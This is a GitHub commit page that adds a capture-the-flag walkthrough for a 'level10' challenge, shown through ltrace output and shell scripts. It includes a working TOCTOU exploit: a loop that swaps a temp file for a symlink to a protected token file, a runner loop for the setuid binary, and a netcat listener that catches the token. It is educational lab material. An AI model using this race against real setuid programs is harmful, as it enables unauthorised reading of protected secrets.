Skip to content

Commit

Permalink
Update README.mdx
Browse files Browse the repository at this point in the history
  • Loading branch information
nuoxoxo authored Nov 18, 2024
1 parent 63ab754 commit 3cc3897
Showing 1 changed file with 98 additions and 0 deletions.
98 changes: 98 additions & 0 deletions level10/README.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -54,5 +54,103 @@ printf("Connecting to %s:6969 .. ", "localhost") = 32
^^^^ 🟡
fflush(0xb7fd1a20Connecting to localhost:6969 .. ) = 0
^^^^ 🟡
Idea
- it eems the program interacts with `localhiost:6969`
- we need a valid Host IP :
- `127.0.0.1` or an old trick
- `ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2`
With correct IP:
```b
> ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```b
Inspect w/ `ltrace`:
```b
> ltrace ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
access("/tmp/tmp", 4) = 0
printf("Connecting to %s:6969 .. ", "Localhost") = 32
fflush(0xb7fd1a20Connecting to Localhost:6969 .. ) = 0
socket(2, 1, 0) = 3
inet_addr("Localhost") = 0x0100007f
htons(6969, 1, 0, 0, 0) = 14619
connect(3, 0xbffff71c, 16, 0, 0) = 0
write(3, ".*( )*.\n", 8) = 8
printf("Connected!\nSending file .. "Connected!
) = 27
fflush(0xb7fd1a20Sending file .. ) = 0
open("/tmp/tmp", 0, 010) = 4
^^^^^^^^ 🟡 here is where we hope to force our token in
read(4, "", 4096) = 0
write(3, "", 0) = 0
puts("wrote file!"wrote file!
) = 12
+++ exited (status 12) +++
```

Maybe it sends content of our file to `localhost:6969`
- try and intercept the content
- for that we use a 2nd terminal

```b
# t1
> nc -lk 6969
```
```b
# t2
> ./level10 /tmp/tmp Localhost
> Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```

Figure out a way to make `./level10` to read the true `token`:
- exploit `access()`'s [TOCTOU](https://stackoverflow.com/questions/75587120/how-to-handle-toctou-problem-between-access-and-unlink) vulnerability
- design a file to do the following:
- when `access()` is called it checks the low-priority file
- after that, `./level10` should `open()` and `read()` the high-priotity one

Solution: \
to trick `access` we need a file that _alternates_ its type
- a file of our own permission level
- a symlink of the same name linked to `token`
- we need an alternation script

`alternate.sh`
```b
#!/bin/bash
t=/tmp/tmp
#timeout 2s bash -c '
while true; do
touch $t
rm -rf $t
ln -s /home/user/level10/token $t
rm -rf $t
done
#'
```

- and a script to run `alternate` and `./level10` side by side

`trylevel.s`
```b
#!/bin/bash
#timeout 2s bash -c '
while true; do
/home/user/level10/level10 /tmp/tmp 127.0.0.1 >/dev/null
done
#'
```

- and a 3rd script to unite two previous ones and `netcat`
```b
/tmp/alternate.sh 2>/dev/null & /tmp/runner.sh >/dev/null & nc -lk 6969
```

0 comments on commit 3cc3897

Please sign in to comment.